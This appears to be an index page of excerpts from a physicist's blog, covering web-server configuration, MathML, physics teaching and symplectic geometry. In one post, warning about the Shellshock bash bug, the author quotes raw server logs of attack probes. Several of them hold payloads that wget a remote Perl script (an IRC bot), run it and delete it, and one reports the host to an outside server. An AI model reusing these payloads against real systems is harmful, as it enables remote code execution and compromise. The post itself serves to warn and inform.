Musings

Instiki is my wiki-cum-collaboration platform. It has a built-in WYSIWYG vector-graphics drawing program, which is great for making figures. Unfortunately:

• An extra step is required, in order to convert the resulting SVG into PDF for inclusion in the LaTeX paper. And what you end up with is a directory full of little PDF files (one for each figure), which need to be managed.
• Many of my colleagues would rather use Tikz, which has become the de-facto standard for including figures in LaTeX.

Obviously, I needed to include Tikz support in Instiki. But, up until now, I didn’t really see a good way to do that, given that I wanted something that is

1. Portable
2. Secure

I finally got around to enabling Brotli compression on Golem. Reading the manual, I came across the BrotliAlterETag directive:

Description: How the outgoing ETag header should be modified during compression
Syntax: BrotliAlterETag AddSuffix|NoChange|Remove

with the description:

AddSuffix

Append the compression method onto the end of the ETag, causing compressed and uncompressed representations to have unique ETags. In another dynamic compression module, mod_deflate, this has been the default since 2.4.0. This setting prevents serving “HTTP Not Modified (304)” responses to conditional requests for compressed content.

NoChange

Don’t change the ETag on a compressed response. In another dynamic compression module, mod_deflate, this has been the default prior to 2.4.0. This setting does not satisfy the HTTP/1.1 property that all representations of the same resource have unique ETags.

Remove

Remove the ETag header from compressed responses. This prevents some conditional requests from being possible, but avoids the shortcomings of the preceding options.

Sure enough, it turns out that ETags+compression have been completely broken in Apache 2.4.x. Two methods for saving bandwidth, and delivering pages faster, cancel each other out and chew up more bandwidth than if one or the other were disabled.

I was thinking about dropping support for TLSv1.0 in this webserver. All the major browser vendors have announced that they are dropping it from their browsers. And you’d think that since TLSv1.2 has been around for a decade, even very old clients ought to be able to negotiate a TLSv1.2 connection.

But, when I checked, you can imagine my surprise that this webserver receives a ton of TLSv1 connections… including from the application that powers Planet Musings. Yikes!

The latter is built around the Universal Feed Parser which uses the standard Python urrlib2 to negotiate the connection. And therein lay the problem …

Many years ago, when I was an assistant professor at Princeton, there was a cocktail party at Curt Callan’s house to mark the beginning of the semester. There, I found myself in the kitchen, chatting with Sacha Polyakov. I asked him what he was going to be teaching that semester, and he replied that he was very nervous because — for the first time in his life — he would be teaching an undergraduate course. After my initial surprise that he had gotten this far in life without ever having taught an undergraduate course, I asked which course it was. He said it was the advanced undergraduate Mechanics course (chaos, etc.) and we agreed that would be a fun subject to teach. We chatted some more, and then he said that, on reflection, he probably shouldn’t be quite so worried. After all, it wasn’t as if he was going to teach Quantum Field Theory, “That’s a subject I’d feel responsible for.”

This remark stuck with me, but it never seemed quite so poignant until this semester, when I find myself teaching the undergraduate particle physics course.

For a while now, Frédéric Wang has been urging me to enable native MathML rendering for Safari. He and his colleagues have made many improvements to Webkit’s MathML support. But there were at least two show-stopper bugs that prevented me from flipping the switch.

I really like the science fiction TV series The Expanse. In addition to a good plot and a convincing vision of human society two centuries hence, it depicts, as Phil Plait observes, a lot of good science in a matter-of-fact, almost off-hand fashion. But one scene (really, just a few dialogue-free seconds in a longer scene) has been bothering me. In it, Miller, the hard-boiled detective living on Ceres, pours himself a drink. And we see — as the whiskey slowly pours from the bottle into the glass — that the artificial gravity at the lower levels (where the poor people live) is significantly weaker than near the surface (where the rich live) and that there’s a significant Coriolis effect. Unfortunately, the effect depicted is 3 orders-of-magnitude too big.

There’s a general mantra that we all repeat to ourselves: gauge transformations are not symmetries; they are redundancies of our description. There is an exception, of course: gauge transformations that don’t go to the identity at infinity aren’t redundancies; they are actual symmetries.

Strominger, rather beautifully showed that BMS supertranslations (or, more precisely, a certain diagonal subgroup of $\text{BMS}^+$ (which act as supertranslations on $\mathcal{I}^+$) and $\text{BMS}^-$ (which act as supertranslations on $\mathcal{I}^-$) are symmetries of the gravitational S-matrix. The corresponding conservation laws are equivalent to Weinberg’s Soft-Graviton Theorem. Similarly, in electromagnetism, the $U(1)$ gauge transformations which don’t go to the identity on $\mathcal{I}^\pm$ give rise to the Soft-Photon Theorem.

A while back, there was considerable brouhaha about Hawking’s claim that BMS symmetry had something to do with resolving the blackhole information paradox. Well, finally, a paper from Hawking, Perry and Strominger has arrived.

Cue further brouhaha…

Recently, an old post of mine about the Asymptotic Safety program for quantizing gravity received a flurry of new comments. Inadvertently, one of the pseudonymous commenters pointed out yet another problem with the program, which deserves a post all its own.

Before launching in, I should say that

1. Everything I am about to say was known to Iz Singer in 1978. Though, as with the corresponding result for nonabelian gauge theory, the import seems to be largely unappreciated by physicists working on the subject.
2. I would like to thank Valentin Zakharevich, a very bright young grad student in our Math Department for a discussion on this subject, which clarified things greatly for me.

This semester, I taught the Graduate Mechanics course. As is often the case, teaching a subject leads you to rethink that you thought you understood, sometimes with surprising results.

The subject for today’s homily is Action-Angle variables.

Let $(\mathcal{M},\omega)$ be a $2n$-dimensional symplectic manifold. Let us posit that $\mathcal{M}$ had a foliation by $n$-dimensional Lagrangian tori (a torus, $T\subset M$, is Lagrangian if $\omega|_T =0$). Removing a subset, $S\subset \mathcal{M}$, of codimension $codim(S)\geq 2$, where the leaves are singular, we can assume that all of the leaves on $\mathcal{M}'=\mathcal{M}\backslash S$ are smooth tori of dimension $n$.

The objective is to construct coordinates $\varphi^i, K_i$ with the following properties.

1. The $\varphi^i$ restrict to angular coordinates on the tori. In particular $\varphi^i$ shifts by $2\pi$ when you go around the corresponding cycle on $T$.
2. The $K_i$ are globally-defined functions on $\mathcal{M}$ which are constant on each torus.
3. The symplectic form $\omega= d K_i\wedge d \varphi^i$.

From 1, it’s clear that it’s more convenient to work with the 1-forms $d\varphi^i$, which are single-valued (and closed, but not necessarily exact), rather than with the $\varphi^i$ themselves. In 2, it’s rather important that the $K_i$ are really globally-defined. In particular, an integrable Hamiltonian is a function $H(K)$. The $K_i$ are the $n$ conserved quantities which make the Hamiltonian integrable.

Obviously, a given foliation is compatible with infinitely many “integrable Hamiltonians,” so the existence of a foliation is the more fundamental concept.

All of this is totally standard.

What never really occurred to me is that the standard construction of action-angle variables turns out to be very closely wedded to the particular case of a cotangent bundle, $\mathcal{M}=T^*M$.

As far as I can tell, action-angle variables don’t even exist for foliations of more general symplectic manifolds, $\mathcal{M}$.

It seemed like a straightforward question. If you use Apple’s Contacts.app to store your contacts, you’ve surely noticed this behaviour: some of your contacts auto-magically sprout clickable links for Facetime video/audio chats, with no intervention on your part. I was curious enough to submit a query about it, via Apple’s Support Site:

Contacts.app seems to know whether each of my contacts has registered their email for FaceTime, even if I have NEVER tried to facetime with them (or call their cell-phone or …). How does it do this? Are all of the email addresses in my addressbook automatically uploaded to Apple’s servers? If so, how do I turn this off, as it seems to be a MASSIVE invasion of my privacy.

That was a month and a half ago (2014/11/02). Today, I received a response:

Wow! After a decade, Wikipedia finally rolls out MathML rendering. Currently, only available (as an optional preference) to registered users. Hopefully, in a few more years, they’ll make it the default.

Some implementation details are available at Frédéric’s blog.

Most Linux Distros have released patches for the recently-discovered “Shellshock” bug in /bin/bash. Apple has not, despite the fact that it uses bash as the default system shell (/bin/sh).

If you are running a webserver, you are vulnerable. Even if you avoid the obvious pitfall of writing CGI scripts as shellscripts, you are still vulnerable if one of your Perl (or PHP) scripts calls out to system(). Even Phusion Passenger is vulnerable. And, yes, this vulnerability is being actively exploited on the Web.

internetsurvey-3.erratasec.com - - [24/Sep/2014:20:35:04 -0500] "GET / HTTP/1.0" 301 402 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-" - - -
hosted-by.snel.com - - [25/Sep/2014:02:50:59 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" "-" - - -
census1.shodan.io - - [25/Sep/2014:18:55:31 -0500] "GET / HTTP/1.1" 301 379 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69" "-" - - -
ec2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [25/Sep/2014:20:05:01 -0500] "GET / HTTP/1.1" 301 379 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php5 HTTP/1.0" 301 391 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php HTTP/1.0" 301 390 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 301 395 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /test HTTP/1.0" 301 383 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" -  -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php HTTP/1.0" 404 359 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php5 HTTP/1.0" 404 360 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 364 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /test HTTP/1.0" 404 352 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:29 -0500] "GET / HTTP/1.1" 301 385 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:30 -0500] "GET / HTTP/1.1" 200 155 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:21 -0500] "GET /category/2007/07/making_adscft_precise.html%0A HTTP/1.1" 301 431 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:23 -0500] "GET /category/2007/07/making_adscft_precise.html%0D%0A HTTP/1.1" 301 434 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:24 -0500] "GET /category/2007/07/making_adscft_precise.html%0d%0a HTTP/1.1" 404 393 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:33 -0500] "GET /category/2007/07/making_adscft_precise.html%0a HTTP/1.1" 404 392 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:41 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0A HTTP/1.1" 301 439 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:44 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0a HTTP/1.1" 404 400 "-" "() { :;}; echo -e 'detector'" "-" - - -

Some of these look like harmless probes; others (like the one which tries to download and run an IRCbot on your machine) less so.

If you’re not running a webserver, the danger is less clear. There are persistent (but apparently incorrect) rumours that Apple’s DHCP client may be vulnerable. If true, then your iPhone could easily be pwned by a rogue DHCP server (running on someone’s laptop) at Starbucks.

I don’t know what to do about your iPhone, but at least you can patch your MacOSX machine yourself.

For nearly 20 years, Golem has been the machine on my desk. It’s been my mail server, web server, file server, … ; it’s run Mathematica and TeX and compiled software for me. Of course, it hasn’t been the same physical machine all these years. Like Doctor Who, it’s gone through several reincarnations.

Alas, word came down from the Provost that all “servers” must move (physically or virtually) to the University Data Center. And, bewilderingly, the machine on my desk counted as a “server.”

My eldest turned 18 and voted in her first Primary election this week. This being Texas, she decided to register as a Republican. Which means that, soon, we will start fielding phone calls from political campaigns. So I drafted a set of questions to ask the earnest campaign workers when they call.

Sometimes, for the sake of pedagogy, it is best to suppress some of the ugly details, in order to give a clear exposition of the idea behind a particular concept one is trying to teach. But clarity isn’t achieved by outright lies. And I always find myself frustrated when our introductory courses descend to the latter.

My colleague, Sonia, is teaching the introductory “Waves” course (Phy 315) which, as you might imagine, is all about solving the equation

This has travelling wave solutions, with dispersion relation

If you study solutions to (1), on the interval $[0,L]$, with “free” boundary conditions at the endpoints,

you find standing wave solutions $$u(x,t) = A \cos(k x)\cos( c k t)$$ where the boundary condition at $x=L$ imposes

The first couple of these “normal modes” look like

To “illustrate” this, in their compulsory lab accompanying the course, the students were given the task of measuring the normal modes of a thin metal bar, with free boundary conditions at each end, sinusoidally driven by an electromagnet (of adjustable frequency).

Unfortunately, this “illustration” is a complete lie. The transverse oscillations of the metal bar are governed by an equation which is not even approximately like (1); the dispersion relation looks nothing like (2); “free boundary conditions” look nothing like (3) and therefore it should not surprise you that the normal modes look nothing like (4).

Unfortunately, so inured are they to this sort of thing, that only one (out of 120!) students noticed that something was amiss in their experiment. “Hey,” he emailed Sonia, “Why is the $n=1$ mode absent?”